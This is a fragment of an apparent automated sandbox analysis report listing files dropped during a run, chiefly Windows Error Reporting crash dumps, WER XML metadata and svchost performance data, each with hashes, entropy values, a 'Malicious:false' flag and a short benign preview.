                                                                                                                                                                                                                                SHA1:1FF1A988FFF134F5AE25745E268B1EE07922CE9D
                                                                                                                                                                                                                                SHA-256:B993274CA6275B04E37E5780B4082D3D9C06A8F17497B1B5E44CB167075ADC57
                                                                                                                                                                                                                                SHA-512:FCF1E58245BC7196F540266B81080045611866DF90BED0B23FB7BFAEE8669D82D7FA8BE2003E9BF77A50BA5BA24740291EEC8119C7A70E9F0544C9837AE73802
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.3.7.4.2.0.1.4.1.6.5.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.9.3.3.7.4.2.1.0.9.4.6.0.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.5.e.d.6.5.f.-.c.6.8.b.-.4.8.5.6.-.8.a.5.0.-.f.4.b.0.b.d.2.7.a.f.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.1.d.2.a.3.3.-.6.d.2.f.-.4.a.e.2.-.9.7.a.8.-.0.b.5.1.7.2.6.d.3.9.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.W.y.F.B.n.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.1.8.-.0.0.0.1.-.0.0.1.5.-.4.3.c.8.-.2.a.f.8.b.7.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.e.2.c.b.8.4.a.d.6.c.d.2.6.3.a.3.5.8.d.b.f.0.6.1.5.9.a.b.c.4.4.0.0.0.0.f.f.f.f.!.0.0.0.0.f.b.1.a.e.3.0.e.a.f.6.2.b.9.3.6.f.f.a.f.3.d.b.8.b.7.2.1.3.9.b.d.3.e.2.6.5.9.6.5.!.W.y.F.B.n.l.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.1.0././.0.1.:.1.3.:.5.4.:.1.2.!.0.!.W.y.F.B.n.l...
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 06:10:20 2022, 0x1205a4 type
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):82778
                                                                                                                                                                                                                                Entropy (8bit):1.6817409776945131
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:yGb4gMaL20xOtJUUU884P20XQKScumZ0fawhuPbWzwXM7uQ9c2zQ50:FMaL1kT84P28dSIZ0fRkPOwXMiscmC0
                                                                                                                                                                                                                                MD5:875D245A4233C97EF4DA8480E9B51D2D
                                                                                                                                                                                                                                SHA1:23E21F6B309B43BDB6948D731B39C690E8D4B623
                                                                                                                                                                                                                                SHA-256:26ADE0268D02AC9EF48038F2B2C4365650BD44591C13E29D577985F785A34599
                                                                                                                                                                                                                                SHA-512:BB4A423D3A93DDB9E592BAC57DF472EE4099B3DC3DC4CFDA1E39B4FFBCD0EFE27EC3071A1B97F35528099ACE3F10A1E3F747DA2C940C6B5F6D4EC4B3D7544396
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:MDMP..a..... .......L.;c........................$...........d...(/..........T.......8...........T...............R1......................................................................................................bJ......t.......Lw......................T...........F.;c.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8734
                                                                                                                                                                                                                                Entropy (8bit):3.693562017933097
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:R9l7lZNivZO6YDL96hgmf4X2BpDH89bI2lfeYm:R9lnNixO6Yt6hgmf4rIcfI
                                                                                                                                                                                                                                MD5:1609E0450F404836A3E5AF12BBB2F169
                                                                                                                                                                                                                                SHA1:114578946A7AFE092028B8FBD8A2A4BE5BAB6A7F
                                                                                                                                                                                                                                SHA-256:E41A82AFBEE574275E4EC16E03CC224CF5C7DBD07D8C4AE4E24591176BE97507
                                                                                                                                                                                                                                SHA-512:1E1D6913260FC3AB2C793DA586848A7F5ADF8B0D231DB6642429A8CD4C2A064BBADB877B3CB68076B601E38F97C3A963FD0A5BBF4EB31BBEC4148CEBEB27AF62
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.6.0.<./.P.i.
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4895
                                                                                                                                                                                                                                Entropy (8bit):4.456935197730755
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:cvIwwtl8zsAe70xzI7VFJ5WS2Cfjk0s3rm8M4JDHqrFPyq8vcHqJqtb6w7K7Kd:uILfV7y8ySPfKJDKpWcK8tbz7K7Kd
                                                                                                                                                                                                                                MD5:9DF07A3726DA3EB1EB33A7C19845DE59
                                                                                                                                                                                                                                SHA1:E0643C3D23E73DADD4DEF1C9DF46BC09622AB4E2
                                                                                                                                                                                                                                SHA-256:1478F8A63CD860F1B01576CD0C97E0BC74E2F2F56E488E6AFAF4C3B37E397AA0
                                                                                                                                                                                                                                SHA-512:1D6B6F7FA20F8A4AD35E9D198332E8108E2C593DB0868B132FD1B190B2CC1E947B0B3100B4292821F3A1EF798340D4D8D0D143AEB4F3B252BE83D0B7C84D414E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221819572" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):62544
                                                                                                                                                                                                                                Entropy (8bit):3.0641000913640535
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:AKPYNB1CcJzWgo7g+UsZQD/F5HU6dPj/pJiKaDi7F:AKPYNB1CcJzWgo7g+UsZQDF5HU6dPj/1
                                                                                                                                                                                                                                MD5:6846366FFE7975DC2FB041AFA2BA9A48
                                                                                                                                                                                                                                SHA1:0B22E6384407CBC6EC198342E7DEEAC3E212CC03
                                                                                                                                                                                                                                SHA-256:53F3E545E1DCDDD7EBC085ACDFA0D0A7EDE2A55516D85747A817427771E031C6
                                                                                                                                                                                                                                SHA-512:E35113E01A5DEDCFB15132A23CE9FCBE93B57F4045909C7B6B4C09EA55490C2F9E015916776E18FD5D6C5BF441A52F2B645EDC0E9E17156B76C9DB8A15134571
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                Entropy (8bit):2.703450117759584
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:KilQJP0DX/laRYoOY2W1HHYEZwDytiixD8eB4w6XvKabkKZM2KSAIxb3:flQ/3O/DkiyabkKZM2Kqxb3
                                                                                                                                                                                                                                MD5:2C235CA1F709C38E48E1F7A5AC6C59D3
                                                                                                                                                                                                                                SHA1:8704E17342EB0F2F5DE01E7CA334E6B100917B64
                                                                                                                                                                                                                                SHA-256:3999C2E7D0E5F9BE984D1CC1B2557F4B7471386C09270E1B2342E2C35E527CC9
                                                                                                                                                                                                                                SHA-512:84FDB52E770DD78118FF82B6B55FB6FC3250D4FD3D5EA701D4098143207B234450E22B2B8197B02D25A6638ECA07D9D047DA5A7B836FF44D6F02A45DBCF80ABE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.7.0.6.2.1.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .4.6.3.8.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 4 06:10:27 2022, 0x1205a4 type
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):55876
                                                                                                                                                                                                                                Entropy (8bit):2.066143466516042
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:s8X5XvAGPuONvif7kikQnCId8G0fUXMP3cY0wDgheAlbtMz:LJvAmpVmwObMP3cYND3wbt
                                                                                                                                                                                                                                MD5:72C0960E349B29CA839F6D4633164BD0
                                                                                                                                                                                                                                SHA1:D3603A341EF689F6547362CD3C19FC5C5C1EE061
                                                                                                                                                                                                                                SHA-256:0762E508BAC48DA32EAC6F0656336A4AC5C4D172C157C5FD83844C302071E7BA
                                                                                                                                                                                                                                SHA-512:C1F103AEC03FA186979857A03E6910C906533805AD64E6EDB09ED3C7E8A5858E5457827FAA168FF8129CA9609CCFCC2C071C7B312A53346EC9896ADCD4622C65
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:MDMP..a..... .......S.;c........................l...........$...D.......D....1..........`.......8...........T............!..t...........h...........T...............................................................................bJ..............GenuineIntel...........T...........L.;c.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8284
                                                                                                                                                                                                                                Entropy (8bit):3.6934784872041098
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:R9l7lZNi6g6vN6YDh6dgmfXrCBprS89bnWsfwNm:R9lnNiN6l6Yl6dgmfXrEn1f3
                                                                                                                                                                                                                                MD5:8566C539A5277F730C699D02D6526949
                                                                                                                                                                                                                                SHA1:3A2C455837FC49EEC0623D5635DF9888A991054E
                                                                                                                                                                                                                                SHA-256:311D8E8E655E05FE96F3209A1E1F97EEA8A355C5441C7AEB43ECFCE323593E71
                                                                                                                                                                                                                                SHA-512:2C7D5B1573DEA0B114DBA17B0A94AC279DFCE1DA77DF232ED4631ACF61F47B1F7948B1B88C9D3D95CF30C805379668F5974CD2015B11E5B02B1DAA8F319B14BD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.7.6.<./.P.i.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4694
                                                                                                                                                                                                                                Entropy (8bit):4.461820625710006
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:cvIwwtl8zsAe702I7VFJ5WS2Cfjkos3rm8M4JPcumFY+q8IuSOM/IMsAkd:uILfV7GySPfSJUunDuZIIMLkd
                                                                                                                                                                                                                                MD5:20046FD946356CC2B362EB7FC6383819
                                                                                                                                                                                                                                SHA1:37ECA3BD0A632D3FFB9FC6383675E1E06FA7457D
                                                                                                                                                                                                                                SHA-256:3AE588267ACEA6A92B072D082A131AAAE6BBE7FC3224869690D1B3D94E9AA0F2
                                                                                                                                                                                                                                SHA-512:66D859CBAF6FADAAAC659D8905B428CE66984E9FD95FE832FC8CE68C5A1650BC57842C08A4F102140826CFAD354102A2DB578440D853CFDC40685F19ECE18ACC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221819572" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):64778
                                                                                                                                                                                                                                Entropy (8bit):3.060169637942282
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:lblKv57J9YWC3oWgmBkQDZFExs5dPj/OJ5APTfA0VsEG:lblKv57J9YWC3oWgmBkQ1FExs5dPj/OF
                                                                                                                                                                                                                                MD5:585569DC1AC083BB084EDD6E95AFE8CB
                                                                                                                                                                                                                                SHA1:B704C84B1542A452C59B3314DB62BE46C40B1A70
                                                                                                                                                                                                                                SHA-256:030F495387C1C98748E558425A1EECCAB10458AF202572CC95125F82209431A4
                                                                                                                                                                                                                                SHA-512:1112B34FAA597F351B485E2CE4C42497A8432A482C2D5CDEBF5AAA46D8CE746DADA005FE952F849D20A7A0070E510982574332C45277BB5B0631733F84C17B2A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                Entropy (8bit):2.7043662332771246
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:KilQD7R13lWCY/YhWsmH8YEZ9etiimBReDrwvb+I1Uark+M99SwIwb3:flQDPYWOOBUark+M99awb3
                                                                                                                                                                                                                                MD5:57F2F4056B70C7B0FE5FF85933551E0F
                                                                                                                                                                                                                                SHA1:0114A1FC33F691352959343ABC2B8543565AC800
                                                                                                                                                                                                                                SHA-256:9A4831F38B483848FA9839FCBBEC0C3DB54D0AE3348DD5BDF889E4AC30A56389
                                                                                                                                                                                                                                SHA-512:28234315CDF292E24FC94F2175D930DC4AF3D168EDD455A7B6235E66A27440B4B05A51237F581762FE74A1B2698F05BCBB0D3427997325A8950CD3A92A05D578
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.7.0.6.2.1.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .4.6.3.8.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):65334
                                                                                                                                                                                                                                Entropy (8bit):3.058367745143629
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:N+sVloNE/OXJVUjoRoDLF/QDmFc5sLdPU/tRjeqsh0tW3jwQq:N+sVloNE/OXJVUjoRoDLF/QaFc5sLdPA
                                                                                                                                                                                                                                MD5:5394AD643B1DF7C22B93E0CF7B92732E
                                                                                                                                                                                                                                SHA1:0C092339F25D24E63434425756FEA3353DF10EB8
                                                                                                                                                                                                                                SHA-256:D00B79CB6BD28CC92DD94FA5A57D6023178CFD292EF4D741C7F48110A8294E3E
                                                                                                                                                                                                                                SHA-512:E8DB961007B883BFD2B5A5D127AA07F3DEC67F15871A0DDC64EA19EF1353A090A938DC06C65F02A76630687E8F006FCEF9C12C934A96263556804B22A966F399
                                                                                                                                                                                                                                Malicious:false
